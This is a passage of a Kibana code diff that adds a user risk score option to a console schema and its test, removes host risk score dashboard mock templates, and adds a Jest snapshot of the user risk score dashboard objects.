a/x-pack/plugins/security_solution/server/lib/prebuilt_dev_tool_content/schema.test.ts b/x-pack/plugins/security_solution/server/lib/prebuilt_dev_tool_content/schema.test.ts index 278b518c0c161..13b318158aac3 100644 --- a/x-pack/plugins/security_solution/server/lib/prebuilt_dev_tool_content/schema.test.ts +++ b/x-pack/plugins/security_solution/server/lib/prebuilt_dev_tool_content/schema.test.ts @@ -12,9 +12,12 @@ describe('ReadConsoleRequestSchema', () => { expect(() => ReadConsoleRequestSchema.params.validate({ console_id: '123' })).toThrow(); }); - it.each([['enable_host_risk_score']])('should allow console_id %p', async (template) => { - expect(ReadConsoleRequestSchema.params.validate({ console_id: template })).toEqual({ - console_id: template, - }); - }); + it.each([['enable_host_risk_score', 'enable_user_risk_score']])( + 'should allow console_id %p', + async (template) => { + expect(ReadConsoleRequestSchema.params.validate({ console_id: template })).toEqual({ + console_id: template, + }); + } + ); }); diff --git a/x-pack/plugins/security_solution/server/lib/prebuilt_dev_tool_content/schema.ts b/x-pack/plugins/security_solution/server/lib/prebuilt_dev_tool_content/schema.ts index ed4f5fbcc93e9..cf01f0ef9f040 100644 --- a/x-pack/plugins/security_solution/server/lib/prebuilt_dev_tool_content/schema.ts +++ b/x-pack/plugins/security_solution/server/lib/prebuilt_dev_tool_content/schema.ts @@ -9,6 +9,9 @@ import { schema } from '@kbn/config-schema'; export const ReadConsoleRequestSchema = { params: schema.object({ - console_id: schema.oneOf([schema.literal('enable_host_risk_score')]), + console_id: schema.oneOf([ + schema.literal('enable_host_risk_score'), + schema.literal('enable_user_risk_score'), + ]), }), }; diff --git a/x-pack/plugins/security_solution/server/lib/prebuilt_saved_objects/mocks.ts b/x-pack/plugins/security_solution/server/lib/prebuilt_saved_objects/mocks.ts deleted file mode 100644 index 0f1616aa225fc..0000000000000 --- a/x-pack/plugins/security_solution/server/lib/prebuilt_saved_objects/mocks.ts +++ /dev/null @@ -1,414 +0,0 @@ -/* - * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one - * or more contributor license agreements. Licensed under the Elastic License - * 2.0; you may not use this file except in compliance with the Elastic License - * 2.0. - */ - -export const expectedSavedObjectTemplate = [ - { - attributes: { - fieldAttrs: '{}', - fields: '[]', - runtimeFieldMap: '{}', - timeFieldName: '@timestamp', - title: 'ml_host_risk_score_default', - }, - coreMigrationVersion: '7.13.4', - id: 'ml-host-risk-score-default-index-pattern', - migrationVersion: { 'index-pattern': '7.11.0' }, - references: [], - type: 'index-pattern', - updated_at: '2021-08-18T18:37:41.486Z', - }, - { - attributes: { - description: null, - state: { - datasourceStates: { - indexpattern: { - layers: { - 'b885eaad-3c68-49ad-9891-70158d912dbd': { - columnOrder: [ - '8dcda7ec-1a1a-43b3-b0b8-e702943eed5c', - 'e82aed80-ee04-4ad1-9b9d-fde4a25be58a', - 'aa4ad9b2-8829-4517-aaa8-7ed7e5793e9b', - ], - columns: { - '8dcda7ec-1a1a-43b3-b0b8-e702943eed5c': { - customLabel: true, - dataType: 'string', - isBucketed: true, - label: 'Host Name', - operationType: 'terms', - params: { - missingBucket: false, - orderBy: { columnId: 'aa4ad9b2-8829-4517-aaa8-7ed7e5793e9b', type: 'column' }, - orderDirection: 'desc', - otherBucket: true, - size: 20, - }, - scale: 'ordinal', - sourceField: 'host.name', - }, - 'aa4ad9b2-8829-4517-aaa8-7ed7e5793e9b': { - customLabel: true, - dataType: 'number', - isBucketed: false, - label: 'Cumulative Risk Score', - operationType: 'max', - scale: 'ratio', - sourceField: 'risk_stats.risk_score', - }, - 'e82aed80-ee04-4ad1-9b9d-fde4a25be58a': { - dataType: 'date', - isBucketed: true, - label: '@timestamp', - operationType: 'date_histogram', - params: { interval: '1h' }, - scale: 'interval', - sourceField: '@timestamp', - }, - }, - incompleteColumns: {}, - }, - }, - }, - }, - filters: [], - query: { language: 'kuery', query: '' }, - visualization: { - layers: [ - { - accessors: ['aa4ad9b2-8829-4517-aaa8-7ed7e5793e9b'], - layerId: 'b885eaad-3c68-49ad-9891-70158d912dbd', - palette: { name: 'default', type: 'palette' }, - position: 'top', - seriesType: 'bar_stacked', - showGridlines: false, - splitAccessor: '8dcda7ec-1a1a-43b3-b0b8-e702943eed5c', - xAccessor: 'e82aed80-ee04-4ad1-9b9d-fde4a25be58a', - }, - ], - legend: { isVisible: true, position: 'right' }, - preferredSeriesType: 'bar_stacked', - title: 'Empty XY chart', - valueLabels: 'hide', - }, - }, - title: 'Host Risk Score (Max Risk Score Histogram)', - visualizationType: 'lnsXY', - }, - coreMigrationVersion: '7.13.4', - id: 'd3f72670-d3a0-11eb-bd37-7bb50422e346', - migrationVersion: { lens: '7.13.1' }, - references: [ - { - id: 'ml-host-risk-score-default-index-pattern', - name: 'indexpattern-datasource-current-indexpattern', - type: 'index-pattern', - }, - { - id: 'ml-host-risk-score-default-index-pattern', - name: 'indexpattern-datasource-layer-b885eaad-3c68-49ad-9891-70158d912dbd', - type: 'index-pattern', - }, - ], - type: 'lens', - updated_at: '2021-08-18T18:48:30.689Z', - }, - { - attributes: { - fieldAttrs: '{"signal.rule.type":{"count":1}}', - fields: '[]', - runtimeFieldMap: '{}', - timeFieldName: '@timestamp', - title: '.siem-signals-default', - }, - coreMigrationVersion: '7.13.4', - id: 'siem-signals-default-index-pattern', - migrationVersion: { 'index-pattern': '7.11.0' }, - references: [], - type: 'index-pattern', - updated_at: '2021-08-18T16:27:39.980Z', - }, - { - attributes: { - description: '', - kibanaSavedObjectMeta: { - searchSourceJSON: - '{"query":{"query":"","language":"kuery"},"filter":[],"indexRefName":"kibanaSavedObjectMeta.searchSourceJSON.index"}', - }, - title: 'Host Risk Score (Rule Breakdown)', - uiStateJSON: '{}', - version: 1, - visState: - '{"title":"Host Risk Score (Rule Breakdown)","type":"table","aggs":[{"id":"2","enabled":true,"type":"sum","params":{"field":"signal.rule.risk_score","customLabel":"Total Risk Score"},"schema":"metric"},{"id":"1","enabled":true,"type":"count","params":{"customLabel":"Number of Hits"},"schema":"metric"},{"id":"3","enabled":true,"type":"terms","params":{"field":"host.name","orderBy":"2","order":"desc","size":20,"otherBucket":false,"otherBucketLabel":"Other","missingBucket":false,"missingBucketLabel":"Missing","customLabel":"Host"},"schema":"split"},{"id":"4","enabled":true,"type":"terms","params":{"field":"signal.rule.name","orderBy":"2","order":"desc","size":20,"otherBucket":false,"otherBucketLabel":"Other","missingBucket":false,"missingBucketLabel":"Missing","customLabel":"Rule Name"},"schema":"bucket"},{"id":"5","enabled":true,"type":"terms","params":{"field":"signal.rule.type","orderBy":"2","order":"desc","size":20,"otherBucket":false,"otherBucketLabel":"Other","missingBucket":false,"missingBucketLabel":"Missing","customLabel":"Rule Type"},"schema":"bucket"}],"params":{"perPage":10,"showPartialRows":false,"showMetricsAtAllLevels":false,"showTotal":false,"showToolbar":false,"totalFunc":"sum","percentageCol":"","row":true}}', - }, - coreMigrationVersion: '7.13.4', - id: '42371d00-cf7a-11eb-9a96-05d89f94ad96', - migrationVersion: { visualization: '7.13.1' }, - references: [ - { - id: 'siem-signals-default-index-pattern', - name: 'kibanaSavedObjectMeta.searchSourceJSON.index', - type: 'index-pattern', - }, - ], - type: 'visualization', - updated_at: '2021-08-18T16:27:39.980Z', - }, - { - attributes: { - description: '', - kibanaSavedObjectMeta: { - searchSourceJSON: - '{"query":{"query":"not user.name: *$","language":"kuery"},"filter":[],"indexRefName":"kibanaSavedObjectMeta.searchSourceJSON.index"}', - }, - title: 'Associated Users (Rule Breakdown)', - uiStateJSON: '{}', - version: 1, - visState: - '{"title":"Associated Users (Rule Breakdown)","type":"table","aggs":[{"id":"2","enabled":true,"type":"sum","params":{"field":"signal.rule.risk_score","customLabel":"Total Risk Score"},"schema":"metric"},{"id":"1","enabled":true,"type":"count","params":{"customLabel":"Number of Hits"},"schema":"metric"},{"id":"3","enabled":true,"type":"terms","params":{"field":"user.name","orderBy":"2","order":"desc","size":20,"otherBucket":false,"otherBucketLabel":"Other","missingBucket":false,"missingBucketLabel":"Missing","customLabel":"User"},"schema":"split"},{"id":"4","enabled":true,"type":"terms","params":{"field":"signal.rule.name","orderBy":"2","order":"desc","size":20,"otherBucket":false,"otherBucketLabel":"Other","missingBucket":false,"missingBucketLabel":"Missing","customLabel":"Rule Name"},"schema":"bucket"},{"id":"5","enabled":true,"type":"terms","params":{"field":"signal.rule.type","orderBy":"2","order":"desc","size":20,"otherBucket":false,"otherBucketLabel":"Other","missingBucket":false,"missingBucketLabel":"Missing","customLabel":"Rule Type"},"schema":"bucket"}],"params":{"perPage":10,"showPartialRows":false,"showMetricsAtAllLevels":false,"showTotal":false,"showToolbar":false,"totalFunc":"sum","percentageCol":"","row":true}}', - }, - coreMigrationVersion: '7.13.4', - id: 'a62d3ed0-cf92-11eb-a0ff-1763d16cbda7', - migrationVersion: { visualization: '7.13.1' }, - references: [ - { - id: 'siem-signals-default-index-pattern', - name: 'kibanaSavedObjectMeta.searchSourceJSON.index', - type: 'index-pattern', - }, - ], - type: 'visualization', - updated_at: '2021-08-18T16:27:39.980Z', - }, - { - attributes: { - description: '', - kibanaSavedObjectMeta: { - searchSourceJSON: - '{"query":{"query":"","language":"kuery"},"filter":[],"indexRefName":"kibanaSavedObjectMeta.searchSourceJSON.index"}', - }, - title: 'Host Risk Score (Tactic Breakdown)- Verbose', - uiStateJSON: '{}', - version: 1, - visState: - '{"title":"Host Risk Score (Tactic Breakdown)- Verbose","type":"table","aggs":[{"id":"1","enabled":true,"type":"sum","params":{"field":"signal.rule.risk_score","customLabel":"Total Risk Score"},"schema":"metric"},{"id":"3","enabled":true,"type":"terms","params":{"field":"host.name","orderBy":"1","order":"desc","size":20,"otherBucket":false,"otherBucketLabel":"Other","missingBucket":false,"missingBucketLabel":"Missing","customLabel":"Host"},"schema":"split"},{"id":"5","enabled":true,"type":"terms","params":{"field":"signal.rule.threat.tactic.name","orderBy":"1","order":"desc","size":50,"otherBucket":false,"otherBucketLabel":"Other","missingBucket":true,"missingBucketLabel":"Other","customLabel":"Tactic"},"schema":"bucket"},{"id":"6","enabled":true,"type":"terms","params":{"field":"signal.rule.threat.technique.name","orderBy":"1","order":"desc","size":50,"otherBucket":false,"otherBucketLabel":"Other","missingBucket":true,"missingBucketLabel":"Other","customLabel":"Technique"},"schema":"bucket"},{"id":"7","enabled":true,"type":"count","params":{"customLabel":"Number of Hits"},"schema":"metric"}],"params":{"perPage":10,"showPartialRows":false,"showMetricsAtAllLevels":false,"showTotal":false,"showToolbar":false,"totalFunc":"sum","percentageCol":"","row":true}}', - }, - coreMigrationVersion: '7.13.4', - id: 'b2dbc9b0-cf94-11eb-bd37-7bb50422e346', - migrationVersion: { visualization: '7.13.1' }, - references: [ - { - id: 'siem-signals-default-index-pattern', - name: 'kibanaSavedObjectMeta.searchSourceJSON.index', - type: 'index-pattern', - }, - ], - type: 'visualization', - updated_at: '2021-08-18T16:27:39.980Z', - }, - { - attributes: { color: '#D36086', description: '', name: 'experimental' }, - coreMigrationVersion: '7.13.4', - id: '1d00ebe0-f3b2-11eb-beb2-b91666445a94', - references: [], - type: 'tag', - updated_at: '2021-08-18T16:27:39.980Z', - }, - { - attributes: { - description: - 'This dashboard allows users to drill down further into the details of the risk components associated with a particular host.', - hits: 0, - kibanaSavedObjectMeta: { - searchSourceJSON: '{"query":{"language":"kuery","query":""},"filter":[]}', - }, - optionsJSON: '{"hidePanelTitles":false,"useMargins":true}', - panelsJSON: - '[{"version":"7.13.4","type":"visualization","gridData":{"x":0,"y":0,"w":48,"h":3,"i":"eaa57cf4-7ca3-4919-ab76-dbac0eb6a195"},"panelIndex":"eaa57cf4-7ca3-4919-ab76-dbac0eb6a195","embeddableConfig":{"savedVis":{"title":"","description":"","type":"markdown","params":{"fontSize":12,"openLinksInNewTab":false,"markdown":"The Host Risk Score capability is an experimental feature released in 7.14. You can read further about it [here](https://github.com/elastic/detection-rules/blob/main/docs/experimental-machine-learning/host-risk-score.md)."},"uiState":{},"data":{"aggs":[],"searchSource":{"query":{"query":"","language":"kuery"},"filter":[]}}},"hidePanelTitles":true,"enhancements":{}}},{"version":"7.13.4","type":"lens","gridData":{"x":0,"y":3,"w":48,"h":15,"i":"e11ed08e-70d0-4c69-991a-12e20dc89440"},"panelIndex":"e11ed08e-70d0-4c69-991a-12e20dc89440","embeddableConfig":{"enhancements":{"dynamicActions":{"events":[{"eventId":"339da811-5c23-4432-9649-53cb066e6aaf","triggers":["VALUE_CLICK_TRIGGER"],"action":{"factoryId":"URL_DRILLDOWN","name":"Go to Host View","config":{"url":{"template":"{{kibanaUrl}}/app/security/hosts/{{context.panel.filters.[0].meta.params.query}}"},"openInNewTab":true,"encodeUrl":true}}}]}},"hidePanelTitles":false},"title":"Cumulative Host Risk Score (multiple hosts)","panelRefName":"panel_e11ed08e-70d0-4c69-991a-12e20dc89440"},{"version":"7.13.4","type":"visualization","gridData":{"x":0,"y":18,"w":24,"h":28,"i":"cae82aa1-20c8-4354-94ab-3934ac53b8fe"},"panelIndex":"cae82aa1-20c8-4354-94ab-3934ac53b8fe","embeddableConfig":{"enhancements":{"dynamicActions":{"events":[{"eventId":"0fd43778-bd5d-4b2b-85c3-47ac3b756434","triggers":["VALUE_CLICK_TRIGGER"],"action":{"factoryId":"URL_DRILLDOWN","name":"Go to Host View","config":{"url":{"template":"{{kibanaUrl}}/app/security/hosts/{{context.panel.filters.[0].meta.params.query}}"},"openInNewTab":true,"encodeUrl":true}}}]}},"hidePanelTitles":false},"title":"Associated Rules of Risky Hosts","panelRefName":"panel_cae82aa1-20c8-4354-94ab-3934ac53b8fe"},{"version":"7.13.4","type":"visualization","gridData":{"x":24,"y":18,"w":24,"h":28,"i":"8d09b97c-a023-4b7e-9e9d-1c46e726a487"},"panelIndex":"8d09b97c-a023-4b7e-9e9d-1c46e726a487","embeddableConfig":{"enhancements":{"dynamicActions":{"events":[{"eventId":"593ff0e6-25da-47ad-b81d-9a0106c0e9aa","triggers":["VALUE_CLICK_TRIGGER"],"action":{"factoryId":"URL_DRILLDOWN","name":"Go to Host View","config":{"url":{"template":"{{kibanaUrl}}/app/security/hosts/{{context.panel.filters.[0].meta.params.query}}"},"openInNewTab":true,"encodeUrl":true}}}]}},"hidePanelTitles":false},"title":"Associated Users of Risky Hosts","panelRefName":"panel_8d09b97c-a023-4b7e-9e9d-1c46e726a487"},{"version":"7.13.4","type":"visualization","gridData":{"x":0,"y":46,"w":48,"h":16,"i":"0c9c8318-ebb0-47fb-919a-1836ebf232ae"},"panelIndex":"0c9c8318-ebb0-47fb-919a-1836ebf232ae","embeddableConfig":{"enhancements":{"dynamicActions":{"events":[{"eventId":"a76ea63c-da92-4bad-b3d6-6df823e1c04b","triggers":["VALUE_CLICK_TRIGGER"],"action":{"factoryId":"URL_DRILLDOWN","name":"Go to Host View","config":{"url":{"template":"{{kibanaUrl}}/app/security/hosts/{{context.panel.filters.[0].meta.params.query}}"},"openInNewTab":true,"encodeUrl":true}}}]}},"hidePanelTitles":false},"title":"Tactic Breakdown of Risky Hosts (Verbose)","panelRefName":"panel_0c9c8318-ebb0-47fb-919a-1836ebf232ae"}]', - timeRestore: false, - title: 'Drilldown of Host Risk Score', - version: 1, - }, - coreMigrationVersion: '7.13.4', - id: '6f05c8c0-cf77-11eb-9a96-05d89f94ad96', - migrationVersion: { dashboard: '7.13.1' }, - references: [ - { - id: 'd3f72670-d3a0-11eb-bd37-7bb50422e346', - name: 'e11ed08e-70d0-4c69-991a-12e20dc89440:panel_e11ed08e-70d0-4c69-991a-12e20dc89440', - type: 'lens', - }, - { - id: '42371d00-cf7a-11eb-9a96-05d89f94ad96', - name: 'cae82aa1-20c8-4354-94ab-3934ac53b8fe:panel_cae82aa1-20c8-4354-94ab-3934ac53b8fe', - type: 'visualization', - }, - { - id: 'a62d3ed0-cf92-11eb-a0ff-1763d16cbda7', - name: '8d09b97c-a023-4b7e-9e9d-1c46e726a487:panel_8d09b97c-a023-4b7e-9e9d-1c46e726a487', - type: 'visualization', - }, - { - id: 'b2dbc9b0-cf94-11eb-bd37-7bb50422e346', - name: '0c9c8318-ebb0-47fb-919a-1836ebf232ae:panel_0c9c8318-ebb0-47fb-919a-1836ebf232ae', - type: 'visualization', - }, - { - id: '1d00ebe0-f3b2-11eb-beb2-b91666445a94', - name: 'tag-1d00ebe0-f3b2-11eb-beb2-b91666445a94', - type: 'tag', - }, - ], - type: 'dashboard', - updated_at: '2021-08-18T17:09:15.576Z', - }, - { - attributes: { - fieldAttrs: '{}', - fields: '[]', - runtimeFieldMap: '{}', - timeFieldName: '@timestamp', - title: 'ml_host_risk_score_latest_default', - }, - coreMigrationVersion: '7.13.4', - id: 'ml-host-risk-score-latest-default-index-pattern', - migrationVersion: { 'index-pattern': '7.11.0' }, - references: [], - type: 'index-pattern', - updated_at: '2021-08-18T18:47:22.500Z', - }, - { - attributes: { - description: null, - state: { - datasourceStates: { - indexpattern: { - layers: { - '2f34d626-d0ee-4ade-9e75-13c480699485': { - columnOrder: [ - '9c8c581f-6cb8-4ecf-8eb3-4c6df33edc5d', - 'c547501b-fe04-4073-8b4e-dbbdc3a4ff04', - 'e2444d64-721a-4532-9633-5b206eee76d6', - ], - columns: { - '9c8c581f-6cb8-4ecf-8eb3-4c6df33edc5d': { - customLabel: true, - dataType: 'string', - isBucketed: true, - label: 'Host Name', - operationType: 'terms', - params: { - missingBucket: false, - orderBy: { columnId: 'c547501b-fe04-4073-8b4e-dbbdc3a4ff04', type: 'column' }, - orderDirection: 'desc', - otherBucket: true, - size: 20, - }, - scale: 'ordinal', - sourceField: 'host.name', - }, - 'c547501b-fe04-4073-8b4e-dbbdc3a4ff04': { - customLabel: true, - dataType: 'number', - isBucketed: false, - label: 'Risk Score', - operationType: 'sum', - scale: 'ratio', - sourceField: 'risk_stats.risk_score', - }, - 'e2444d64-721a-4532-9633-5b206eee76d6': { - customLabel: true, - dataType: 'string', - isBucketed: false, - label: 'Current Risk', - operationType: 'last_value', - params: { sortField: '@timestamp' }, - scale: 'ordinal', - sourceField: 'risk.keyword', - }, - }, - incompleteColumns: {}, - }, - }, - }, - }, - filters: [], - query: { language: 'kuery', query: '' }, - visualization: { - columns: [ - { columnId: '9c8c581f-6cb8-4ecf-8eb3-4c6df33edc5d', isTransposed: false }, - { - alignment: 'left', - columnId: 'c547501b-fe04-4073-8b4e-dbbdc3a4ff04', - hidden: true, - isTransposed: false, - }, - { columnId: 'e2444d64-721a-4532-9633-5b206eee76d6', isTransposed: false }, - ], - layerId: '2f34d626-d0ee-4ade-9e75-13c480699485', - }, - }, - title: 'Current Risk Score for Hosts', - visualizationType: 'lnsDatatable', - }, - coreMigrationVersion: '7.13.4', - id: 'dc289c10-d4ff-11eb-a0ff-1763d16cbda7', - migrationVersion: { lens: '7.13.1' }, - references: [ - { - id: 'ml-host-risk-score-latest-default-index-pattern', - name: 'indexpattern-datasource-current-indexpattern', - type: 'index-pattern', - }, - { - id: 'ml-host-risk-score-latest-default-index-pattern', - name: 'indexpattern-datasource-layer-2f34d626-d0ee-4ade-9e75-13c480699485', - type: 'index-pattern', - }, - ], - type: 'lens', - updated_at: '2021-08-18T17:07:41.806Z', - }, - { - attributes: { - description: - 'This dashboard shows the most current list of risky hosts (Top 20) in an environment. ', - hits: 0, - kibanaSavedObjectMeta: { - searchSourceJSON: '{"query":{"language":"kuery","query":""},"filter":[]}', - }, - optionsJSON: '{"hidePanelTitles":false,"useMargins":true}', - panelsJSON: - '[{"version":"7.13.4","type":"visualization","gridData":{"x":0,"y":0,"w":48,"h":3,"i":"287b65e9-0aaa-42ee-ab7b-d60b3937d37a"},"panelIndex":"287b65e9-0aaa-42ee-ab7b-d60b3937d37a","embeddableConfig":{"savedVis":{"title":"","description":"","type":"markdown","params":{"fontSize":12,"openLinksInNewTab":false,"markdown":"The Host Risk Score capability is an experimental feature released in 7.14. You can read further about it [here](https://github.com/elastic/detection-rules/blob/main/docs/experimental-machine-learning/host-risk-score.md)."},"uiState":{},"data":{"aggs":[],"searchSource":{"query":{"query":"","language":"kuery"},"filter":[]}}},"hidePanelTitles":true,"enhancements":{}},"title":"Note:"},{"version":"7.13.4","type":"lens","gridData":{"x":16,"y":3,"w":16,"h":15,"i":"654d55f8-f873-4348-96cd-5dce0b56ac32"},"panelIndex":"654d55f8-f873-4348-96cd-5dce0b56ac32","embeddableConfig":{"enhancements":{"dynamicActions":{"events":[{"eventId":"b04e60d5-4e34-4589-af2e-8e9c3a15936f","triggers":["FILTER_TRIGGER"],"action":{"factoryId":"DASHBOARD_TO_DASHBOARD_DRILLDOWN","name":"Go to Dashboard","config":{"useCurrentFilters":true,"useCurrentDateRange":true}}}]}},"hidePanelTitles":false},"title":"Current Risk Scores for Hosts","panelRefName":"panel_654d55f8-f873-4348-96cd-5dce0b56ac32"}]', - timeRestore: false, - title: 'Current Risk Score for Hosts', - version: 1, - }, - coreMigrationVersion: '7.13.4', - id: '27b483b0-d500-11eb-a0ff-1763d16cbda7', - migrationVersion: { dashboard: '7.13.1' }, - references: [ - { - id: 'dc289c10-d4ff-11eb-a0ff-1763d16cbda7', - name: '654d55f8-f873-4348-96cd-5dce0b56ac32:panel_654d55f8-f873-4348-96cd-5dce0b56ac32', - type: 'lens', - }, - { - id: '6f05c8c0-cf77-11eb-9a96-05d89f94ad96', - name: '654d55f8-f873-4348-96cd-5dce0b56ac32:drilldown:DASHBOARD_TO_DASHBOARD_DRILLDOWN:b04e60d5-4e34-4589-af2e-8e9c3a15936f:dashboardId', - type: 'dashboard', - }, - { - id: '1d00ebe0-f3b2-11eb-beb2-b91666445a94', - name: 'tag-1d00ebe0-f3b2-11eb-beb2-b91666445a94', - type: 'tag', - }, - ], - type: 'dashboard', - updated_at: '2021-08-18T17:08:00.467Z', - }, -]; diff --git a/x-pack/plugins/security_solution/server/lib/prebuilt_saved_objects/routes/__snapshots__/create_prebuilt_saved_objects.test.ts.snap b/x-pack/plugins/security_solution/server/lib/prebuilt_saved_objects/routes/__snapshots__/create_prebuilt_saved_objects.test.ts.snap new file mode 100644 index 0000000000000..641772784ccc4 --- /dev/null +++ b/x-pack/plugins/security_solution/server/lib/prebuilt_saved_objects/routes/__snapshots__/create_prebuilt_saved_objects.test.ts.snap @@ -0,0 +1,610 @@ +// Jest Snapshot v1, https://goo.gl/fbAQLP + +exports[`createPrebuiltSavedObjects should create saved objects from given template - "hostRiskScoreDashboards" 1`] = ` +Array [ + Object { + "attributes": Object { + "fieldAttrs": "{\\"kibana.alert.rule.name\\":{\\"count\\":2},\\"signal.rule.name\\":{\\"count\\":2},\\"signal.rule.risk_score\\":{\\"count\\":2},\\"signal.rule.type\\":{\\"count\\":1},\\"host.os.family\\":{\\"count\\":1},\\"host.os.full\\":{\\"count\\":1},\\"host.os.name\\":{\\"count\\":1},\\"host.os.platform\\":{\\"count\\":1},\\"host.os.version\\":{\\"count\\":1},\\"signal.rule.rule_id\\":{\\"count\\":2},\\"signal.rule.threat.tactic.id\\":{\\"count\\":2},\\"host.id\\":{\\"count\\":1},\\"host.name\\":{\\"count\\":1}}", + "fields": "[]", + "runtimeFieldMap": "{}", + "timeFieldName": "@timestamp", + "title": ".siem-signals-default", + "typeMeta": "{}", + }, + "coreMigrationVersion": "8.3.0", + "id": "d3ae2f80-fbc1-11eb-bac9-4d64e825480b", + "migrationVersion": Object { + "index-pattern": "8.0.0", + }, + "references": Array [], + "type": "index-pattern", + "updated_at": "2022-06-22T21:55:25.560Z", + }, + Object { + "attributes": Object { + "color": "#32057a", + "description": "", + "name": "ueba", + }, + "coreMigrationVersion": "8.3.0", + "id": "14104360-2534-11ec-ad40-03fece8605c9", + "migrationVersion": Object { + "tag": "8.0.0", + }, + "references": Array [], + "type": "tag", + "updated_at": "2022-06-22T21:55:25.560Z", + }, + Object { + "attributes": Object { + "description": "", + "state": Object { + "datasourceStates": Object { + "indexpattern": Object { + "layers": Object { + "b885eaad-3c68-49ad-9891-70158d912dbd": Object { + "columnOrder": Array [ + "1fced52d-7ba5-4254-8656-fe0d7ced586a", + "e82aed80-ee04-4ad1-9b9d-fde4a25be58a", + "1d9b32cd-62d9-44e5-bf43-109011adc714", + "1d9b32cd-62d9-44e5-bf43-109011adc714X0", + "1d9b32cd-62d9-44e5-bf43-109011adc714X1", + ], + "columns": Object { + "1d9b32cd-62d9-44e5-bf43-109011adc714": Object { + "dataType": "number", + "isBucketed": false, + "label": "cumulative_sum(sum(signal.rule.risk_score))", + "operationType": "formula", + "params": Object { + "formula": "cumulative_sum(sum(signal.rule.risk_score))", + "isFormulaBroken": false, + }, + "references": Array [ + "1d9b32cd-62d9-44e5-bf43-109011adc714X1", + ], + "scale": "ratio", + }, + "1d9b32cd-62d9-44e5-bf43-109011adc714X0": Object { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Part of cumulative_sum(sum(signal.rule.risk_score))", + "operationType": "sum", + "params": Object { + "emptyAsNull": false, + }, + "scale": "ratio", + "sourceField": "signal.rule.risk_score", + }, + "1d9b32cd-62d9-44e5-bf43-109011adc714X1": Object { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Part of cumulative_sum(sum(signal.rule.risk_score))", + "operationType": "cumulative_sum", + "references": Array [ + "1d9b32cd-62d9-44e5-bf43-109011adc714X0", + ], + "scale": "ratio", + }, + "1fced52d-7ba5-4254-8656-fe0d7ced586a": Object { + "dataType": "string", + "isBucketed": true, + "label": "Top 30 values of user.name", + "operationType": "terms", + "params": Object { + "missingBucket": false, + "orderBy": Object { + "fallback": true, + "type": "alphabetical", + }, + "orderDirection": "asc", + "otherBucket": false, + "parentFormat": Object { + "id": "terms", + }, + "size": 30, + }, + "scale": "ordinal", + "sourceField": "user.name", + }, + "e82aed80-ee04-4ad1-9b9d-fde4a25be58a": Object { + "dataType": "date", + "isBucketed": true, + "label": "@timestamp", + "operationType": "date_histogram", + "params": Object { + "includeEmptyRows": true, + "interval": "1d", + }, + "scale": "interval", + "sourceField": "@timestamp", + }, + }, + "incompleteColumns": Object {}, + }, + }, + }, + }, + "filters": Array [], + "query": Object { + "language": "kuery", + "query": "not user.name: SYSTEM", + }, + "visualization": Object { + "layers": Array [ + Object { + "accessors": Array [ + "1d9b32cd-62d9-44e5-bf43-109011adc714", + ], + "layerId": "b885eaad-3c68-49ad-9891-70158d912dbd", + "layerType": "data", + "position": "top", + "seriesType": "bar_stacked", + "showGridlines": false, + "splitAccessor": "1fced52d-7ba5-4254-8656-fe0d7ced586a", + "xAccessor": "e82aed80-ee04-4ad1-9b9d-fde4a25be58a", + }, + ], + "legend": Object { + "isVisible": true, + "legendSize": "auto", + "position": "right", + }, + "preferredSeriesType": "bar_stacked", + "title": "Empty XY chart", + "valueLabels": "hide", + "yLeftExtent": Object { + "mode": "full", + }, + "yRightExtent": Object { + "mode": "full", + }, + }, + }, + "title": "User Risk Score (Max Risk Score Histogram)", + "visualizationType": "lnsXY", + }, + "coreMigrationVersion": "8.3.0", + "id": "60454070-9a5d-11ec-9633-5f782d122340", + "migrationVersion": Object { + "lens": "8.3.0", + }, + "references": Array [ + Object { + "id": "d3ae2f80-fbc1-11eb-bac9-4d64e825480b", + "name": "indexpattern-datasource-layer-b885eaad-3c68-49ad-9891-70158d912dbd", + "type": "index-pattern", + }, + Object { + "id": "14104360-2534-11ec-ad40-03fece8605c9", + "name": "tag-ref-14104360-2534-11ec-ad40-03fece8605c9", + "type": "tag", + }, + ], + "type": "lens", + "updated_at": "2022-06-22T22:06:12.160Z", + }, + Object { + "attributes": Object { + "fieldAttrs": "{\\"signal.rule.type\\":{\\"count\\":1},\\"host.name\\":{\\"count\\":1},\\"signal.rule.name\\":{\\"count\\":1}}", + "fields": "[]", + "runtimeFieldMap": "{}", + "timeFieldName": "@timestamp", + "title": ".siem-signals-default", + "typeMeta": "{}", + }, + "coreMigrationVersion": "8.3.0", + "id": "siem-signals-default-index-pattern", + "migrationVersion": Object { + "index-pattern": "8.0.0", + }, + "references": Array [], + "type": "index-pattern", + "updated_at": "2022-06-22T21:55:25.560Z", + }, + Object { + "attributes": Object { + "description": "", + "kibanaSavedObjectMeta": Object { + "searchSourceJSON": "{\\"query\\":{\\"query\\":\\"user.name: root\\",\\"language\\":\\"kuery\\"},\\"filter\\":[],\\"indexRefName\\":\\"kibanaSavedObjectMeta.searchSourceJSON.index\\"}", + }, + "title": "Associated Users (Rule Breakdown)", + "uiStateJSON": "{}", + "version": 1, + "visState": "{\\"title\\":\\"Associated Users (Rule Breakdown)\\",\\"type\\":\\"table\\",\\"aggs\\":[{\\"id\\":\\"2\\",\\"enabled\\":true,\\"type\\":\\"sum\\",\\"params\\":{\\"field\\":\\"signal.rule.risk_score\\",\\"customLabel\\":\\"Total Risk Score\\",\\"emptyAsNull\\":false},\\"schema\\":\\"metric\\"},{\\"id\\":\\"1\\",\\"enabled\\":true,\\"type\\":\\"count\\",\\"params\\":{\\"customLabel\\":\\"Number of 